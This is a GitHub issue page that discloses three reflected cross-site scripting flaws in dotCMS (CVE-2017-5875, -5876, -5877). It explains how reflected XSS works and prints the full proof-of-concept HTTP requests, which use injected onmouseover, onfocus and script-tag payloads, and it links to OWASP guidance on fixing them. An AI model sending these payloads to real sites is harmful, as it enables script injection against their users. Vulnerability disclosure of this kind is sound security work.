You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The server reads data directly from the HTTP request and reflects it
back in the HTTP response. Reflected XSS exploits occur when an
attacker causes a victim to supply dangerous content to a vulnerable
web application, which is then reflected back to the victim and
executed by the web browser. The most common mechanism for delivering
malicious content is to include it as a parameter in a URL that is
posted publicly or e-mailed directly to the victim. URLs constructed
in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a
vulnerable site. After the site reflects the attacker's content back
to the victim, the content is executed by the victim's browser.
XSS CVE-2017-5876:
GET /news-events/events/?date=2017-02-02yqqta"onmouseover%3d"alert(1)"style%3d"position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b"y5w4q&cat=3b8c53ec-f6ba-4b81-adef-6b7ed38a8490 HTTP/1.1
This issue has been automatically marked as stale because it has not had activity within the past 90 days. It will be closed in 30 days no further activity occurs. Thank you.
The server reads data directly from the HTTP request and reflects it
back in the HTTP response. Reflected XSS exploits occur when an
attacker causes a victim to supply dangerous content to a vulnerable
web application, which is then reflected back to the victim and
executed by the web browser. The most common mechanism for delivering
malicious content is to include it as a parameter in a URL that is
posted publicly or e-mailed directly to the victim. URLs constructed
in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a
vulnerable site. After the site reflects the attacker's content back
to the victim, the content is executed by the victim's browser.
XSS CVE-2017-5875 (Authentication Necessary):
POST /dotCMS/myAccount HTTP/1.1
Host: demo.dotcms.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.dotcms.com/dotCMS/myAccount
Cookie: JSESSIONID=D95CD5DB89C287CEA2234432695E867A; opvc=848b4f88-adbd-40d6-a69b-d4160a8410fa; sitevisitscookie=1; dmid=1969f627-d1c7-4955-8c96-945a612bb883; _ga=GA1.2.2066223524.1486029583; _ga=GA1.3.2066223524.1486029583; SHARED_SESSION_ID=UYBDKCZQ6YF0; DWRSESSIONID=GEXwqywzgm8NFrjv8YRJNCHj*Dl; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
dispatch=editUserAddress&userId=%24%7BmyAccountForm.userId%7D&addressID=0q6rt0"><script>alert(1)<%2fscript>bewiz&prefix=other&firstName=Admin&lastName=User&suffix=&title=&emailAddress=admin%40dotcms.com&password=&newPassword=
![captura3](https://cloud.githubusercontent.com/assets/7010771/22641039/6f6164c8-ec55-11e6-9265-091996a2e61f.JPG)
XSS CVE-2017-5876:
![captura2](https://cloud.githubusercontent.com/assets/7010771/22641035/6cd4477a-ec55-11e6-9957-8414439ab882.JPG)
GET /news-events/events/?date=2017-02-02yqqta"onmouseover%3d"alert(1)"style%3d"position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b"y5w4q&cat=3b8c53ec-f6ba-4b81-adef-6b7ed38a8490 HTTP/1.1
XSS CVE-2017-5877 :
GET /about-us/locations/index?direction=testlr68w"onfocus%3d"alert(1)"autofocus%3d"d0mt3&milesR=500
How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
The text was updated successfully, but these errors were encountered: